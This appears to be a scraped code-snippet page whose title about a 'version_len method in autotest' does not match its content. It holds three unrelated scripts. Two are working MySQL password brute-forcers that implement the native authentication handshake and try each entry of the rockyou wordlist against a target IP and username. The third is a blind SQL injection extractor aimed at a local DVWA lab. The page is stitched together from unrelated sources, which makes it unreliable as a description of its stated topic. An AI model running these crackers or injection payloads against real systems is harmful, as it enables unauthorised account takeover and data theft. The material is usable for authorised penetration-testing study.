How to use version_len method in autotest

Best Python code snippet using autotest_python

mysqlcheckMemMapMutiThread.py

Source:mysqlcheckMemMapMutiThread.py

1# Python3 compatible2# Mysql password cracker, works with Secure Password Authentication algorithm3# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html4# Nov 20205# Author: Ivica Stipovic6# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file7# If you do, any connect attempt will return OK server response / will allow anonymous access8# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module910import socket11import sys12import time13import timeit14import struct15from hashlib import sha116import mmap17import threading1819pass_found=02021def calculation(username_binary, TCP_IP,TCP_PORT):22	23#Iterate through the passwords, make hash out of each one24# The biggest issue is that network sockets don't fit with CUDA - Device IO communication is not managed by CUDA25# Network sockets probably require multithreading with CPU26					27		dbversion=02829		for line in iter(m.readline,b""):3031			sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)32			sock.connect((TCP_IP,TCP_PORT))33			version,addr=sock.recvfrom(1024)34    35			payload_len=version[0]36			ver_offset=537			version_len=038			a=039			40			while(version[a+ver_offset]!=0):41				version_len+=142				a+=14344			if dbversion==0:45				print ("[+] Database version =", version[5:5+version_len].decode('utf-8'))46				dbversion=14748# You must calculate the version string length to get to salts49# move to 6th byte of the response and loop until first \00 terminator50# Count the bytes and calculate len of the Version field5152			salt1=version[10+version_len:18+version_len]        # -1 to cut off null terminator53			salt2=version[37+version_len:49+version_len]        # -1 to cut off null terminator5455			salt=salt1+salt256			salt3=bytearray()57			salt3.extend(salt)58    59			line2=line.rstrip()60				61			datalen=int(55+len(username_binary))62			datalen2=datalen.to_bytes(3,'little')               6364# hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes65			bytes1 = sha1(line2).digest()66   67			concat1 = salt368			concat2 = sha1(sha1(line2).digest()).digest()69 70			bytes3=bytearray()71			concat=concat1+concat272			bytes3.extend(concat)73			bytes3=sha1(bytes3).digest()74     75			hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))76			pass_hash=hash77    78			data=datalen2                                          # Ensure length field is 3 bytes (hence +\x00\x00)79			data +=b'\x01'                                         # packet number=180			data +=b'\x0d\xa2'                                     # Client capabilities -> careful with that!!81			data +=b'\x00\x00'                                     # Extended capabilities=082			data +=b'\x00\x00\x00\x40'                             # Max size83			data +=b'\x08'                                         # Charset=8 latin184			data +=b'\x00' *23                                     # 23 bytes are reserved=085			data +=username_binary                                 # Username (from input parameter) with 00 termination 86			data +=b'\x00'                                         # Username NULL terminator87			data +=b'\x14'                                         # Not documented and wireshaek has no idea what this is!!88			data +=pass_hash89			data +=b'\x00'9091			sock.sendall(data)92			authcode,addr=sock.recvfrom(1024)93			94			if authcode[5]==0:95				print ("[+] Password found:",line2)96				sock.close()97		98			sock.close()99100		101# End of function/subroutine102103if len(sys.argv)!=3:104105    print ("Usage: python {} <ip address> <username>".format(sys.argv[0]))106    sys.exit()107108TCP_IP          =sys.argv[1]109username        =sys.argv[2]110username_binary =username.encode('utf-8')111TCP_PORT        =3306112data_calculated=b""113114start = timeit.default_timer()115116# we're doing memory mapped file search to speed up stuff117# Start of the subroutine/function118119with open("rockyou2.txt","rb") as f:120		m=mmap.mmap(f.fileno(),length=0,access=mmap.ACCESS_READ)  121		passx=m.readline().rstrip()122123#Multithreading124		t1=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))125		t2=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))126	127		t1.start()128		t2.start()129130#Wait for threads to finish131		132		t1.join()133		t2.join()134		stop = timeit.default_timer()135		execution_time = stop - start136137		print("[+] Program Executed in "+str(execution_time))138					139			140141142143
...

mysqlcheck4.py

Source:mysqlcheck4.py

1# Python3 compatible2# Mysql password cracker, works with Secure Password Authentication algorithm3# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html4# Nov 20205# Author: Ivica Stipovic6# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file7# If you do, any connect attempt will return OK server response / will allow anonymous access8# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module910import socket11import sys12import time13import struct14from hashlib import sha11516if len(sys.argv)!=3:1718    print ("Usage: python mysqlcheck.py <ip address> <username>")19    sys.exit()2021TCP_IP          =sys.argv[1]22username        =sys.argv[2]23username_binary =username.encode('utf-8')24TCP_PORT        =33062526f=open("rockyou2.txt","r") 2728passx=f.readlines()                             2930#Iterate through the passwords, make hash out of each one31dbversion=03233for line in passx:3435    sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)36    sock.connect((TCP_IP,TCP_PORT))37    version,addr=sock.recvfrom(1024)38    39    payload_len=version[0]40    ver_offset=541    version_len=042    a=04344    while(version[a+ver_offset]!=0):45        version_len+=146        a+=14748    if dbversion==0:49        print ("Database version =", version[5:5+version_len].decode('utf-8'))50        dbversion=15152# You must calculate the version string length to get to salts53# move to 6th byte of the response and loop until first \00 terminator54# Count the bytes and calculate len of the Version field5556    salt1=version[10+version_len:18+version_len]        # -1 to cut off null terminator57    salt2=version[37+version_len:49+version_len]        # -1 to cut off null terminator5859    salt=salt1+salt260    salt3=bytearray()61    salt3.extend(salt)62    63    line2=line.rstrip()6465    datalen=int(55+len(username_binary))66    datalen2=datalen.to_bytes(3,'little')               6768# hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes69    bytes1 = sha1(line2.encode('utf-8')).digest()70   71    concat1 = salt372    concat2 = sha1(sha1(line2.encode('utf-8')).digest()).digest()73 74    bytes3=bytearray()75    concat=concat1+concat276    bytes3.extend(concat)77    bytes3=sha1(bytes3).digest()78     79    hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))80    pass_hash=hash81    82    data=datalen2                                     	   # Ensure length field is 3 bytes (hence +\x00\x00)83    data +=b'\x01'                                         # packet number=184    data +=b'\x0d\xa2'									   # Client capabilities -> careful with that!!85    data +=b'\x00\x00'                                     # Extended capabilities=086    data +=b'\x00\x00\x00\x40'                             # Max size87    data +=b'\x08'                                         # Charset=8 latin188    data +=b'\x00' *23                                     # 23 bytes are reserved=089    data +=username_binary                                            # Username (from input parameter) with 00 termination 90    data +=b'\x00'                                         # Username NULL terminator91    data +=b'\x14'                                         # Not documented and wireshaek has no idea what this is!!92    data +=pass_hash93    data +=b'\x00'94                             95    sock.sendall(data)96    authcode,addr=sock.recvfrom(1024)9798   99    if (authcode[5]==21 and authcode[6])==4:    #Error code for "access denied"100            print ("Access denied for password:",line2)101    else:102           if authcode[5]==0:103            print ("Password found:",line2)
...

sqli_blind_medium.py

Source:sqli_blind_medium.py

...3import urllib4LIMIT = 1005PHPSESSID = "vj4j0b0s5vo65mdd54ohullaq4"6SECURITY = "medium"7def get_db_version_len():8    version_len = 09    while True:10        version_len += 111        url = f"http://localhost/vulnerabilities/sqli_blind/"12        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",13                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",14                "Accept-Encoding": "gzip, deflate",15                "Accept-Language": "en-US,en;q=0.9",16                "Connection": "close",17                "Upgrade-Insecure-Requests": "1"}18        19        burp_proxy = {"http": "http://127.0.0.1:8080",20                      "https": "https://127.0.0.1:8080"21                      }22        burp_data = {"id": f"1 and length(@@VERSION)={version_len}",23                     "Submit": "Submit"}24        25        cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}26        response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)27        28        html_doc = response.content.decode()29        soup = BeautifulSoup(html_doc, 'html.parser')30        if soup.pre.text == "User ID exists in the database.":31            return version_len32        if version_len >= 100:33            raise ValueError(f'Tried {version_len} time but table len not found')   34        35def get_db_ver_char_ascii(digit):36    target_ascii = 037    while True:38        target_ascii += 139        url = f"http://localhost/vulnerabilities/sqli_blind/"40        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",41                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",42                "Accept-Encoding": "gzip, deflate",43                "Accept-Language": "en-US,en;q=0.9",44                "Connection": "close",45                "Upgrade-Insecure-Requests": "1"}46        47        burp_proxy = {"http": "http://127.0.0.1:8080",48                      "https": "https://127.0.0.1:8080"49                      }50        burp_data = {"id": f"1 and ascii(substr(@@VERSION,{digit},1))={target_ascii}",51                     "Submit": "Submit"}52        53        cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}54        response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)55        56        html_doc = response.content.decode()57        soup = BeautifulSoup(html_doc, 'html.parser')58        if soup.pre.text == "User ID exists in the database.":59            return chr(target_ascii)60        if target_ascii > 127:61            raise ValueError(f'char not found on {digit}')62def get_db_ver(name_len):63    table_name = ""64    for idx in range(1, name_len + 1):65        table_name += get_db_ver_char_ascii(idx)66    return table_name67if __name__ == "__main__":68    db_version_len = get_db_version_len()69    print(db_version_len)70    db_version = get_db_ver(db_version_len)71    print(db_version)72    ...

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.